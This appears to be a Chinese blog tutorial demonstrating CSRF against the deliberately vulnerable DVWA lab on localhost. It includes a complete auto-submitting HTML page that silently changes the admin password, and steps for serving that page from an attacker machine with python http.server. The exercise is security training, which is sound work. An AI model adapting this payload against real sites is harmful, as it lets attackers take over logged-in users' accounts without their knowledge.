CSRF(跨站请求伪造)

🧨 什么是 CSRF?

CSRF(Cross-Site Request Forgery) 是一种攻击方式,诱导已登录的用户浏览器发送未授权请求,比如更改密码、转账等,而用户并未察觉。

攻击前提:

  1. 受害者已登录某网站,并保持登录状态(有 Cookie)。
  2. 攻击者诱导受害者访问一个恶意页面,该页面发出请求到受害者登录的站点。
  3. 服务端认为请求合法,因为带有受害者的 Cookie。

✅ DVWA 中的 CSRF 测试位置:

  1. 拉取 DVWA 镜像并运行:docker run --rm -it -p 8080:80 vulnerables/web-dvwa
  2. 打开 DVWA Web 界面:http://localhost:8080,用户名:admin,密码:password
  3. 登录后,点击左侧菜单 "CSRF"。
  4. 默认功能是 修改用户密码,就是我们的测试点。

🔥 第一步:构造 CSRF 攻击页面(HTML 文件)

查看修改密码页面的前端代码:

你可以用如下代码,保存为 csrf_attack.html:

bash 复制代码
<!DOCTYPE html>
<html>
  <body>
    <h3>😈 正在发起 CSRF 攻击...</h3>
    <form action="http://localhost:8080/vulnerabilities/csrf/" method="GET">
      <input type="hidden" name="password_new" value="hacked123" />
      <input type="hidden" name="password_conf" value="hacked123" />
      <input type="hidden" name="Change" value="Change" />
      <input type="submit" value="点我也改密码" />
    </form>

    <script>
      document.forms[0].submit(); // 自动提交
    </script>
  </body>
</html>

🔄 第二步:启动一个 HTTP 服务器(攻击服务器)

假设你用攻击者机器,运行:

bash 复制代码
python3 -m http.server 8082

然后在浏览器打开:

bash 复制代码
http://<攻击者IP>:8082/csrf_attack.html

如果你已登录 DVWA,访问该页面就会修改你的密码。

输入网址后回车结果:

✅ 第三步:验证密码是否被改了

回到 DVWA,尝试用新密码登录:

  • 用户名:admin
  • 密码:hacked123

🧱 防御思路(了解):

DVWA 高安全等级下会引入 CSRF Token 防护机制,攻击者无法伪造。

相关推荐
Luminbox紫创测控4 天前
车载AR-HUD阳光倒灌与热效应:太阳光模拟器如何复现太阳辐射?
测试工具·汽车·ar·安全性测试·测试标准
DsirNg6 天前
凭证不是登录态:从攻击面重做浏览器认证设计
oauth·xss·csrf·token·cookie·认证授权·web 安全
网安蟹佬霸14 天前
Android安全攻防实战:从APK逆向到Frida动态Hook全流程详解(附脚本)
android·前端·安全·web安全·逆向·csrf·网安
Luminbox紫创测控14 天前
汽车前照灯阳光灼烧:光学热仿真与太阳光模拟器验证
人工智能·测试工具·汽车·安全性测试·测试标准
矩子01X16 天前
从 NI 50 周年到具身智能合规:测试行业正在发生的四重范式转移
安全性测试·汽车测试
Luminbox紫创测控20 天前
车载HUD阳光倒灌测试:GB/T46926标准的太阳光模拟器方案
测试工具·汽车·安全性测试·测试标准
DsirNg20 天前
登录态失控时,前端如何止损:从令牌轮换到会话退出的完整设计
xss·csrf·cookie·会话管理·前端安全·登录态·刷新令牌
中创云图21 天前
道路空洞检测方法对比:探地雷达如何快速识别地下空洞
安全性测试
障碍的枫子23 天前
xss和CSRF的攻击和防御
前端·xss·csrf
qyyyyy57023 天前
英文技术标准和协议规范怎么读?RFC、接口规范与安全标准 PDF 翻译流程
网络协议·网络安全·机器翻译·csrf·技术美术